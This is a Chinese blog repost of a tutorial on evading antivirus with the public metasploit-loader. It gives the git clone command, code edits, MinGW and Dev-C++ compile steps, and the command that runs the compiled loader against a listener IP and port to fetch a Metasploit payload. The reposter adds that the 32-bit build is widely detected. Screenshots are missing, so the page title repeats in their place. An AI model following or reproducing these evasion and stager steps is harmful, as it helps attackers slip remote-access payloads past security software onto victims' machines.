通过MSF加载器绕过AV

  • A+
所属分类:安全文章

文章转自:

https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad

https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8

PS:这个metasploit-loader8年前的东西了,我测试了下32位的,被杀很多,不像原作者说的全免杀,不知道是不是伪造的,64位的能过一些,随机应变吧

32

git clone https://github.com/rsmudge/metasploit-loader.git

通过MSF加载器绕过AV

编辑metasploit-loader/master/src/main.cmain函数中,注释93-98行,修改99行如下

通过MSF加载器绕过AV

使用MinGW编译

i686-w64-mingw32-gccmain.c -o loadmeta.exe -lws2_32

通过MSF加载器绕过AV

通过MSF加载器绕过AV

执行

通过MSF加载器绕过AV

64

使用Dev C ++工具编译

https://sourceforge.net/projects/orwelldevcpp/

通过MSF加载器绕过AV

确保安装完整,同时拥有3264

通过MSF加载器绕过AV

新建一个Project Loader64并将文件另存为Loader64

Project设置为C Project,将应用程序设置为Console Application。从命令行执行

通过MSF加载器绕过AV

通过MSF加载器绕过AV

https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c

粘贴进去

修改以下内容

通过MSF加载器绕过AV

#include <winsocks2.h>放在windows.h上面

通过MSF加载器绕过AV

编译选项中添加-lws2_32

通过MSF加载器绕过AV

F9编译

MSF监听

通过MSF加载器绕过AV

Windows上执行

Loader64.exe192.168.137.128 9500

通过MSF加载器绕过AV

通过MSF加载器绕过AV


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: